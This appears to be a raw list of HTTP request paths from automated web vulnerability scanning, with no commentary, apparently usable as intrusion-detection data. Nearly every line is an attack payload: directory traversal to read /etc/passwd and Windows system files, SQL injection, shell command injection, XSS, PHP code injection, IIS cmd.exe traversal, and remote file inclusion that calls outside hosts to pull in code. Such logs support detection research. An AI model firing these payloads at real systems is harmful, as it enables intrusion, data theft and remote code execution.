/egaet53a.exe? /miz4r5hz.cfm? /signup.php?referral="> /perl/-e "system('cat /etc/passwd');\" /top.php?stuff="ping\xa0-w\xa09000\xa0-n\xa01\xa01.2.3.4|rem\xa0 /top.php?stuff="|ping -w 10000 -n 1 4.3.2.1|rem /scripts/onwkbtts3uj1.php3 /javascript/htpasswd.doc /en-us/account/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- /javascript/ia.exe /javascript/review.exe /if69ddo1.cfm? /javascript/sections.exe /1r8cfrlf.mscgi? /javascript/java.exe /examples/jsp/jsp2/el/cgi/tseekdir.cgi?location=/etc/passwd\x00 /review.php?id=1&cat=&subcat="> /h5sc3gxy.php? /postscript_fm/ /main.php?logout="rm q21367835&rem /script_path/pgvnuke/pgvindex.php?document_root/header.php=@rfiurl /scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 1174127559-- /3j8echh0.aspx? /javascript/atom.exe /javascript/~jessica.exe /h5i6crm3.pl? /iv5vkgam.pl? /? /examples/jsp/jsp2/el/bandwidth/index.cgi?action=showmonth&year=&month= /h4bi26jd.jsp? /examples/jsp/sessions/webplus.exe?script=webplus_install_path.nasl /javascript/us.exe /scripts/api/orders.json?search[instance_eval]=kernel.fail `ipconfig /all` /j4oqyvga.cfm? /subscriptions.as /scripts/man-cgi?-p id ls /javascript/keys.exe /javascript/patches.exe /v3axg1p8.jspa? /examples/jsp/num/index.php?string=' /javascript/cisco.exe /ows-bin/htimage.exe/path/filename?2,2 /ygkjkngd.x? /cgi-sys/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd| /help.php?q=';del\x09q84185561\x09# /.../.../.../.../.../.../.../.../.../.../etc/passwd /cacti/adodb/server.php?sql='adodb_sql_sql_injection.nasl /dslpwt15.aspx? /q703m78q.mscgi? /82q7ywa8.exe? /d5a5renl.html? /b4vng02k.dll? /recordings/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd /main.php?stuff=&ver\x0c>q94866398&rem\x0c /help.php?q=&ver >q37428189&rem /zv8tv7h8.jsp? /recordings/login.php?user="> /webcgi/sensepost.exe?/c+dir /scripts/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd /examples/jsp/error/c32web.exe/getimage?imagename=cart32.ini\x00.gif /shopadmin.asp?password=abc&username=\"> /g8nu2yy7.idc? /ewc3rz1l.fts? /eei78ore.cfm? /aspscripter/ /javascript/staff.exe /scripts/6gl21a1hiz3s.php /j734qobz.cfm? ////./../.../boot.ini /examples/servlets/servlet/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd /javascript/adodb.exe /cgi-914/pfdispaly.cgi?../../../../../../../../../../etc/passwd /en-us/7o5qp766.kspx? /manager/auktion.cgi?menue=../../../../../../../../../etc/passwd /cacti/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl /recordings/popup.php?include_path=/etc/passwd\x00 /scgi-bin/view_item?html_file=../../../../../../../../../../etc/passwd\x00 /home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor /l752x1ry.htm? /top.php?stuff="|ping -w 10000 -n 1 1.2.3.4|rem /webcgi/ion-p.exe?page=c:\winnt\repair\sam /javascript/banners.exe /examples/jsp/checkbox/detail.asp?nchannel='1 /bl8sefdm.php3? /top.php?stuff="|sleep\x0910\x09# /zuihld5m.mscgi? /qb2xy9aw.pl? /components/com_mospray/scripts/admin.php?basedir=http://192.168.202.96:8080/frznctvhi0i5??&cmd=id /javascript/tele.exe /phpmyadmin/server.pt?open=space&name=";} /cgi-915/view_item?html_file=../../../../../../../../../../etc/passwd\x00 /cgi-bin//_vti_bin/fpcount.exe?page=default.htm|image=3|digits=15 /main.php?stuff=uname >q52464141 # /odzk29aa.x? /examples/jsp/jsp2/el/forumdisplay.php?fid=21"> /node/view/666\"> /azcrfs8d.kspx? /en-us/33y9gcqq.htm? /examples/jsp/error/htmlscript?../../../../../../../../../etc/passwd /7u1pb2xi.nsf? /if69ddo1.asp? /recordings/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\x00 /admin/index.php?path_to_script=http://cirt.net/rfiinc.txt??&cmd=ls /en-us/account/index.php?setlang=gcards_dir_transversal.nasl&lang[gcards_dir_transversal.nasl][file]=../../../../../../../../../../../../etc/passwd /fmnveedu.nsf? /cgi.cgi/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /will-o'brien/ /cgi-win/query?mss=../config /entrylevelmedicaltranscription/ /javascript/purchases.exe /index.php?news7["functions"]=http://192.168.202.96:8080/txenjrxf3? /main.php?logout=\\' /phpmyadmin/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&" /en-us/account/wiki.php/ /_vti_bin/shtml.exe/junk_nonexistant.exe /cvslog.cgi?file= //..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c/windows/win.ini /examples/jsp/sessions/direct.php?rf=/etc/passwd\x00 /replymsg.php?send=1&destin= /scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331923200 /azcrfs8d.x? /scripts_sms/ /lsoix5h3.nsf? /beef/js/scriptaculous.js /igtf0zon.php3? /zv8tv7h8.x? /javascript/recovery.exe /eg2u8pbv.cfm? /ny1b3qq4.jsp? /javascript/certificates.exe /tukodz3j.mscgi? /main.php?stuff=&del;q39916466&rem; /6dlc2zm9.html? /examples/servlets/servlet/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\x00 /yef5f3d5.nsf? /top.php?stuff="ver,>q55729425&rem, /xlj7h65o.php? /rbec2ohx.jspa? /main.php?stuff="ping,-w,7000,-n,1,1.2.3.4|rem, /javascript/apache.exe /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+22+6a+ff+ff+d0+89+ec+61+52+51+68+75+70+00+00+68+74+61+72+74+68+57+53+41+53++>>ctdn /cgi-bin/remindpasswd /xscript/ /awstats/awstats.pl?migrate=|echo;/bin/echo -en "\0367\0322\0041\03201\0311qqj\0042j\0007pq\0211\0343" >> /tmp/xmefwyizyj0;echo|awstats983561.txt /gy23xnjq.do? /scripts/webdriver /examples/jsp/sessions/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\x00 /xsqln7eb.jsp? /hjdzm96v.nsf? /examples/jsp/jsp2/jspx/dsweb/services/user-1"> /javascript/em.exe /ddoworrl.x? /cgi-bin/..\xc1\xc1..\xc1\xc1..\xc1\xc1..\xc1\xc1..\xc1\xc1../winnt/system32/cmd.exe?/c+dir+c:\+/og /inscripta-rib/ /zroo33l4.cfc? /en-us/account/admin/admin.php?sid=' /scripts/2sfdqydfaknx.shtml /opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/whmch8ftkt7kv?\x00 /zmvq66jy.jspa? /main.php?logout="ver,>q74451345&rem, /webcgi/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /top.php?stuff="|ping\x09-w\x097000\x09-n\x091\x094.3.2.1|rem\x09 /en-us/i686v90l.dll? /javascript/lst.exe /xfkun1ku.x? /examples/jsp/num/story.pl?next=../../../../../etc/passwd\x00 /main.php?stuff="\x0drm\x09q27469451\x09# /l4fz1dqw.nsf? /gvx7m5ti.aspx? /javascript/qpid.exe /top.php?stuff=";del q17551646 # /miz4r5hz.jspa? /help.php?q="ping\x09-w\x0911000\x09-n\x091\x091.2.3.4&rem\x09 /iajtej82.cfm? /examples/jsp/checkbox/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd| /javascript/htpasswd.dump /o6ebbirj.cgi? /javascript/oa.exe /stallard-acsac'03/ /h4bi26jd.jspa? /scripts/index.php?p=..\..\..\..\..\..\..\..\..\..\..\..\boot.ini\x00 /8t9v8k7x.jsp? /login.php?lang=/../../../../../../../../../../../../etc/passwd\x00 /scripts/search.jsp?q=%" /confirmunsubscription.php?output=http://192.168.202.118:8080/tzhfyzkbomspvm? /top.php?stuff=";uname\x09>q82281214\x09# /javascript/htpasswd.phtml /javascript/environment.exe /en-us/esmozg5d.cgi? /h21y8w52.mscgi? /1qwv2p5p.cfc? /8x6w469u.asp? /main.php?logout="\x0duname >q69325217 # /top.php?stuff='uname\x09>q68811991\x09# /rdf.exe /82q7ywa8.do? /recordings/pfdispaly?../../../../../../etc/passwd /82q7ywa8.pl? /1r8cfrlf.do? /cgi-bin/index.php?p=..\..\..\..\..\..\..\..\..\..\..\..\boot.ini\x00 /ju0u7kfo.htm? /javascript/torrents.exe /i2n4v4rl.cgi? /opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/frznctvhi0i5?\x00 /javascript/wap.exe /main.php?stuff="|ping\x09-w\x0911000\x09-n\x091\x094.3.2.1|rem\x09 /javascript/preserve.exe /javascript/test-env.exe /phpmyadmin/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1 /zroo33l4.aspx? /help.php?q=\x0duname\x09>q84752771\x09# /bmeun223.jspa? /examples/jsp/checkbox/starnet/addons/slideshow_full.php?album_name='1495073341 /admbrowse.php?down=1&cur=/etc/&dest=passwd&rid=1&s=[someid] /vhzmaia2.pl? /top.php?stuff="&ver\x0c>q55426988&rem\x0c /htbin/c32web.exe/changeadminpassword /l4fz1dqw.cfc? /javascript/disclaimer.exe /script_mar05/ /help.php?q="\x0auname\x09>q43182957\x09# /subscriptionwizard/ /opensiteadmin/scripts/classes/filter.php?path=@rfiurl\x00 /main.php?stuff='uname\x09>q85216432\x09# /scripts/.cobalt/siteusermod/siteusermod.cgi /examples/jsp/cal/webplus?script=/../../../../etc/passwd /javascript/04.exe /sphera/login/sm_login_screen.php?uid=\"> /preview.php?php_script_path=http://192.168.202.96:8080/4dckqcc0acprbz??&cmd=dir /scripts/search.php?searchstring= /scripts/rx9ysf2iwv4j.html /cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file¤tfolder=/dqoamjxrgv.jsp\x00 /cgi-bin/test2.pl?<script>alert('vulnerable');</script> /top.php?stuff='\x0drm\x09q88128927\x09# /odzk29aa.cfc? /help.php?q=&ping;-w;7000;-n;1;1.2.3.4&rem; /help.php?q=|ping;-w;7000;-n;1;1.2.3.4|rem; /../../../../../../../../../../boot.ini /cacti/quickstore.cgi?page=../../../../../../../../../../etc/passwd\x00html&cart_id= /examples/jsp/checkboxsearch_results.dot?search_query=nessus">/ /examples/jsp/jsp2/jspx/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00 /edzaia0i.cfc? /scripts_genericform/ /recordings/story.pl?next=../../../../../etc/passwd\x00 /0w155a7c.x? /main.php?stuff="&ping\x0c-w\x0c10000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c /examples/jsp/sessions/check_user_id.php?user_id= /help.php?q="del;q24461998&rem; /main.php?stuff='\x0adel q75819271 # /javascript/order.exe /pc_mag_digital_subscription_-_1_yr/ /javascript/declarations.exe /cacti/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331909400,244455451 -- /path_script/createurl.php?formurl=http://192.168.202.118:8080/2aibfaczmac8? /scripts/tomcat_proxy_directory_traversal.nasl1331904241 /javascript/grants.exe /nmw0do67.htm? /7o5qp766.do? /top.php?stuff=";rm\x09q82281214\x09# /uvazfs7p.fts? /fnwhrxyd.cfm? /subscriptions.ora /main.php?stuff="&ping;-w;8000;-n;1;4.3.2.1&rem; /cgi-bin/starnet/addons/slideshow_full.php?album_name='1485593337 /cgi-bin/input.bat?|dir ..\\..\\..\\..\\..\\..\\..\\..\\..\\ /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/tvzjwzrsfg0+>+/dev/null+&')."]=1 /cgis/query?mss=../config /cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters= /scripts/wpnbr.dll /top.php?stuff=;uname\x09>q62254247\x09# /7o5qp766.cfm? /en-us/account/ncbook/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /vhzmaia2.asp? /protection.php?action=logout&siteurl=../../../../../../../../../../boot.ini\x00 /examples/jsp/cal/admin/addentry.php?phpbb_root_path=/etc/passwd\x00 /odzk29aa.mscgi? /news.php?config[script_path]=http://192.168.202.118:8080/2aibfaczmac8?? /scripts/admin.php?zfaction=config /users/scripts/submit.cgi /edv3mapy.html? /what's_new/ /examples/servlets/servlet/catalog.php?action=category_show&id=' /scgi-bin/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\x00.html /scs86g1p.idc? /3j8echh0.php? /scripts/samples/search/queryhit.idq /vac1l5vm.aspx? /en-us/7o5qp766.cfc? /subscriptions.save /main.php?logout="del\xa0q51679818&rem\xa0 /examples/jsp/error/cal_week.php?op=week&catview=999' /yef5f3d5.php? /h5sc3gxy.fts? /v3axg1p8.x? /lsoix5h3.fts? /top.php?stuff="&del\x09q52362944\x09# /include/scripts/export_batch.inc.php?dir=http://192.168.202.118:8080/zz5thkvtmlgl? /main.php?logout=uname >q63335376 # /7o5qp766.mscgi? /i7prbs22.php3? /scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,077396515632,4,5,6,7,8,9,10,11-- /javascript/yt.exe /examples/jsp/colors/webadmin.php?show=/etc/passwd /phpmyadmin/scripts /bn857frh.jspa? /examples/jsp/sessions/javascript.php?abs_path=/etc/passwd\x00 /7dbjwpw6.exe? /zuihld5m.x? /scs86g1p.asp? /main.php?stuff=&uname >q43247564 # /examples/servlets/servlet/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'-- /bn857frh.nsf? /yef5f3d5.cgi? /phpmyadmin/documentation.html?phpmyadmin=../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd /p043snfr.idc? /jscript.php?my_ms[root]=@rfiurl?my_ms[root]=@rfiurl? /cgi-bin/cmd1.exe?/c+dir /scripts/login/default.aspx /examples/jsp/error/cgiforum.pl?thesection=../../../../../../../../etc/passwd\x00 /examples/jsp/checkbox/index.php?include_files[]=&include_files[query_string]=/etc/passwd /opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.118:8080/tzhfyzkbomspvm?\x00 /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../vtigerservice.php\x00 /thvgjebp.exe /quick_scripts/ /bzuf9ozq.php3? /l752x1ry.aspx? /help.php?q="\x0duname\x09>q76412123\x09# /ygkjkngd.do? /main.php?stuff=';sleep\x098\x09# /examples/jsp/colors/rss.php?blogid=1&profile=../../config/config.properties.php\x00 /copatranscript_20061030/ /administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.96:8080/4dckqcc0acprbz? /backend/classes.php?include_path=../lib/jinzora.js\x00 /chonlpritranscript/ /faxsurvey?cat /etc/passwd /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/etfvyyifyy.sh'); function v /examples/servlets/servlet/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; /ext_scripts/ /enscript/ /teens o'poppin/ /javascript/wrap.exe /subscriptions/ /cgi-local/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /index.php?skin= /pxagj7n7.jsp? /removal_tool.exe/ /newtopic.php?forumid=' /help.php?q="ping\x0c-w\x0c11000\x0c-n\x0c1\x0c1.2.3.4|rem\x0c /forum1_professionnel.asp?n=1771&nn=100&page=/.../.../.../.../.../.../boot.ini /javascript/random.exe /qczkquis.dll? /hydrocodone-prescription/ /phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904220&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 multihtml.pl?multi=/etc/passwd\x00html /qhvu0pdg.x? /javascript/w3c.exe /cacti/newsscript.pl?mode=admin /etc/passwd /examples/servlets/servlet/htmlscript?../../../../../../../../../etc/passwd /7dbjwpw6.fts? /en-us/fo564rei.pl? /main.php?logout='\x0asleep\x098\x09# /d7ktpmcq.kspx? /cacti/help/index.php?help_file=../../../../../../../../../../../etc/passwd /help.php?q="&ver\x0c>q33739327&rem\x0c /zmvq66jy.php? /examples/jsp/colors/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl /examples/jsp/checkbox/view_user.php?list=1&letter=&sort_by='select /..\..\..\..\..\..\/winnt/win.ini /bemarket/postscript/postscript.php?p_mode=http://192.168.202.96:8080/no4ghqiguzhst? /recordings/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\x00.jpg /l752x1ry.html? /javascript/apac.exe /examples/jsp/error/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd /static//../../../../../../../../windows/win.ini\x00en /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://192.168.202.96:8080/4dckqcc0acprbz? /apavxugx.htm? /help.php?q="ping\x0b-w\x0b10000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b /debug/errorinfo?title=== /scripts/goto.asp /examples/jsp/sessions/base_qry_common.php?base_path=/etc/passwd\x00 /en-us/i686v90l.php3? /javascript/document.ora /scripts/shop.plx/page=nessus114465198 /scripts/ui/login?user=nessus-1331908727 /pascal's_wager/ /jnv890lt.do? /cgi-win/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|' /javascript/leader.exe /xsqln7eb.asp? /cgi-bin/showcheckins.cgi?person= /report.php?scriptpath=http://192.168.202.118:8080/ghl9il?? /en-us/account/listrec.pl?app=qmh-news&template=;ls /etc| /towels-0.1/src/scripture.php?pageheaderfile=http://192.168.202.118:8080/ghl9il? /examples/jsp/checkbox/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd /en-us/7o5qp766.fts? /javascript/cgi-home.exe /script/ident/ident.inc.php?path_inc=http://192.168.202.118:8080/ghl9il? /fo564rei.html? /phpmyadmin/documentation.html?phpmyadmin= /cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd /en-us/n9xlumt5.x? /cgi-sys/powerup/r.cgi?file=../../../../../../../../../../etc/passwd /b4vng02k.aspx? /examples/jsp/jsp2/jspx/shopaddtocart.asp?productid='42 /169okeyj.cgi? /b1q8bywu.jspa? /h21y8w52.jsp? /d5a5renl.cfc? /nsn/..\util/del.bas /javascript/other.exe /comments.php?scriptpath=http://192.168.202.118:8080/iroy1gvqrrqu?? /javascript/baskets.exe /examples/servlets/servlet/wiki.php/ /examples/jsp/checkbox/error.php?selected_theme= /examples/jsp/cal/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`; /jnt3f86c.cfm? /scripts/apgafvcxoeeh.asp /? /9o6g5vkn.idc? /cgi-bin/index.php?op=default&date=200607' union select 1,1068432583,1,1,1,1,1,1,1,1--&blogid=1 /gvx7m5ti.php3? /examples/jsp/jsp2/jspx/index.php?page=/etc/passwd\x00 /top.php?stuff="ping\x0c-w\x0c7000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c /quagynka.mscgi? /main.php?stuff=&ver,>q36343182&rem, /javascript/printers.exe /javascript/sh.exe /main.php?logout="rm,q59646442&rem, /cacti/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\x00 /index.php/1' /newsscripts/ /ygkjkngd.asp? /? /l752x1ry.mscgi? /examples/jsp/jsp2/el/docs/index.php?lang=/../../../../../../../../../../etc/passwd\x00 /en-us/s7qus4g3.fts? /cgi-bin/htgrep/file=index.html&hdr=/etc/passwd /hipkz026.nsf? /cgi-bin/..\xc1%pc..\xc1%pc..\xc1%pc..\xc1%pc..\xc1%pc../winnt/system32/cmd.exe?/c+dir+c:\+/og /cacti/mylog.html?screen=/etc/passwd /examples/jsp/checkbox/index.php?op=default&date=200607' union select 1,1975764141,1,1,1,1,1,1,1,1--&blogid=1 /en-us/account/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl /speedscript-thm/ /moneylinespecialoffersdescriptionfinal1/ /perscription-cialis/ /scripts/vzdybnanqpc3.sh /javascript/htpasswd.xls /main.php?stuff="ping\xa0-w\xa010000\xa0-n\xa01\xa01.2.3.4&rem\xa0 /0z575z74.idc? /1qwv2p5p.jsp? /htbin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd /rbec2ohx.idc? /m2fpztty.mscgi? /ap58k3ci.php? /examples/jsp/jsp2/el/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html /jujgxwav.kspx? /gabriel's_horn/ /zroo33l4.nsf? /ap58k3ci.aspx? /cgi-home/cgi-test.exe /byrg33fw.fts? /examples/jsp/sessions/error.php?selected_theme= /examples/jsp/num/kb.cgi?view='&lang=en /help.php?q="ping;-w;11000;-n;1;1.2.3.4&rem; /cgi-exe/vssetcookie.exe /9o6g5vkn.asp? /l4fz1dqw.cgi? /script_path/config.inc.php?_path=http://192.168.202.118:8080/ghl9il?? /aj3pf49c.idc? /main.php?stuff=\x0duname >q22755156 # /main.php?logout="del,q74451345&rem, /o35zot2r.aspx? /script/ident/identification.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl? /main.php?stuff=;sleep\x0910\x09# /en-us/hipkz026.nsf? /q703m78q.pl? /help.php?q="ping\x0b-w\x0b11000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b /iisadmpwd/..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og /javascript/.passwd.vb /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+00+00+00+00+00+00+4e+30+00+00+5e+30+00+00+00+00+00+00+4e+30+00+00++>>esbq /examples/jsp/sessions/base_local_rules.php?dir= /33y9gcqq.php? /examples/jsp/cal/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+00+00+40+00+00+c0+2e+69+64+61+74+61+00+00+00+10+00+00+00+30+00+00++>>ctdn /css-scripts/ /o6ebbirj.x? /jobdescription/ /zqqemp6j.cfc? /iktok2bw.htm? /xfkun1ku.jsp? /scripts/server.pt?open=space&name=";} /examples/jsp/colors/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /index.php?news7[\"functions\"]=http://cirt.net/rfiinc.txt? /? /scripts/samples/ctguestb.idc /help.php?q="&del\x0bq33773559&rem\x0b /scripts/lib/version.phps /examples/jsp/jsp2/el/shoutbox.php?conf=../../../../../../../../etc/passwd /cgi-bin/index.php?op=default&date=200607' union select 1,1024298013,1,1,1,1,1,1,1,1--&blogid=1 /examples/jsp/checkbox/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_inohuydx]));die;/* /leaderscript/ /phpmyadmin/wordtrans.php?command=show_desc&advanced=1";id; true " /jw64yq8u.exe? /scripts/event_view.php?eid=34 union select 2145271726 /uc3w3bdi.asp? /ygkjkngd.html? /examples/servlets/servlet/pmwiki.php?globals[farmd]=/etc/passwd\x00 /scripts/6gl21a1hiz3s.html /bl8sefdm.cfc? /cgi.cgi/r.cgi?file=../../../../../../../../../../etc/passwd /main.php?logout=';del\x09q35732238\x09# /rbec2ohx.aspx? /using logon scripts figure 31102332792303/ /b5xdqgz2.fts? /main.php?stuff='\x0auname\x09>q88589696\x09# /scripts/wd7crx47eaml.cfm /cgi-bin/magiccard.cgi?pa=3dpreview&next=3dcustom&page=3d../../../../../../../../../../etc/passwd /p043snfr.php? /scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331919201 /examples/jsp/cal/admin/configset.php?settings_dir=/etc/passwd\x00 /javascript/sessions.exe /javascript/htpasswd.xml /applescript samples/ /cgi-bin/catalog.php?action=category_show&id=' /cat_scripts/ /javascript/notifier.exe /manager/login.php?course="> /forum.asp?n=/../../../etc/passwd|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'/'. /q703m78q.fts? /examples/jsp/jsp2/el/download.php?language=/etc/passwd\x00 /.jsp /scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1641476209-- /cgi-bin/pcadmin/login.asp?idadmin='' or 1=1-- /.../.../.../ /cgi-bin/cssearch.cgi?command=savesetup&setup=`cat /etc/passwd` /javascript/readme.exe /javascript/votes.exe /en-us/hipkz026.jsp? /demo/ms-pe02/catalog.php?cid=0&sid='"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.96:8080/frznctvhi0i5?& /7u1pb2xi.php3? /main.php?logout="ping\xa0-w\xa010000\xa0-n\xa01\xa04.3.2.1|rem\xa0 /templates/prescription /examples/jsp/colors/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl /javascript/pr0n.exe /help.php?q=;sleep\x099\x09# /cgi-bin/gadgets/blog/blogmodel.php?path=/etc/passwd\x00 /script_menu/ /scripts/texis/junk /javascript/balances.exe /m2fpztty.x? /uktranscript/ /javascript/sbin.exe /d5a5renl.cfm? /scripts/admin/utilities_confighelp.asp?helpfield=-1') union select configval as confighelp from storeadmin where configvar='storeversion' or ('1'='2 /main.php?logout="\x0dsleep\x0911\x09# /egaet53a.kspx? /b5xdqgz2.aspx? /javascript/ee.exe /manager/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\x00 /javascript/ad.exe /cgi-bin/index.php?id='union/**/select/**/0,0,579479720,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /cgi-sys/fileseek.cgi?foot=;cat /etc/passwd&head= /test.php?evalme=eval($_server[http_x_xconlkohkokev]); /scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1332010398,1,1,1,1,1,1,1--&blogid=1 /en-us/account/newsdesk.cgi?t=../../../../../../etc/passwd /phpmyadmin/index.php?site=../../../../../../../../etc/passwd\x00 /javascript/2002.exe /raanw4ia.asp? /scripts/index.php?option=frontpage&itemid=2|system(id)|1331905172 /cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://cirt.net/rfiinc.txt?? //a="%3cscript%20src=%27http://www.example.com/test?rnd=q92378185%27%3e%3c%2fscript%3e";document.writeln(unescape(a)) /n1afe1y6.nsf? /scripts/_xuzlr7swn95.cfm /_mem_bin/formslogin.asp?url=> /en-us/hipkz026.exe? /m4kkjf8l.php? /scripts/sc877q2pzqne.php3 /examples/jsp/checkbox/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\x00 /cgi/windmail.exe /opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.118:8080/tzhfyzkbomspvm?\x00 /examples/jsp/jsp2/jspx/adodb/server.php?sql='adodb_sql_sql_injection.nasl /ydexw8by.dll? /3j8echh0.cgi? /sysuser/docmgr/vccheckin.stm?name= /jackrabbit/search.jsp?q=%" /iajtej82.fts? /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php%3fstuff%3d2040844887&frm_user=q39154777&scr_height=&scr_width= /examples/jsp/checkbox/smpwservicescgi.exe /scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919000,0x3a,576275653),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 /examples/jsp/error/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\x00 /examples/jsp/sessions/way-board/way-board.cgi?db=/etc/passwd\x00 /scripts/www/delivery/ac.php?bannerid=-1331904183+or+1=1+--+';passthru(base64_decode($_server[http_nessus_tqgsxin5]));die;/* /s7qus4g3.jsp? /examples/jsp/checkbox/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini /..\xc1%pc..\xc1%pc..\xc1%pc..\xc1%pc..\xc1%pc../winnt/system32/cmd.exe?/c+dir+c:\+/og /cgis/view_item?html_file=../../../../../../../../../../etc/passwd\x00 /page.cgi?../../../../../../../../../../etc/passwd /phpmyadmin/classes/adodbt/sql.php?classes_dir=/etc/passwd\x00 /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/tyrovghehq.sh+>+/dev/null+&')."]=1 /azcrfs8d.aspx? /main.php?stuff="&ping;-w;9000;-n;1;1.2.3.4&rem; /ywaxntrx.fts? /j4drbkil.htm? /b1q8bywu.php? /view/main/twikiusers?rev=2 |less /etc/passwd /examples/jsp/num/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; /examples/jsp/jsp2/el/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd /main.php?stuff=uname >q62419285 # /weq93ppb.dll? /main.php?stuff=ping;-w;9000;-n;1;1.2.3.4&rem; /webcgi/gw5/gwweb.exe?help=bad-request /help.php?q=;del\x09q16213317\x09# /index.php?news7[\"functions\"]=@rfiurl /index.asp?fid=412585577799'error /main.php?logout=ping;-w;10000;-n;1;4.3.2.1|rem; /rpc/..\xc1%pc..\xc1%pc..\xc1%pc..\xc1%pc..\xc1%pc../winnt/system32/cmd.exe?/c+dir+c:\+/og /help.php?q='\x0duname\x09>q79317735\x09# /apavxugx.cfc? /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/liiwypqnoh.sh+>+/dev/null+&'); function v /? /manager/html;jsessionid=ed0aa2d312f1b481ed8142b08949156e?org.apache.catalina.filters.csrf_nonce=a93bfb5c07d765a533dc34533a3ff67d /en-us/.fts /javascript/shockwave.exe /5qnlm5z2.do? 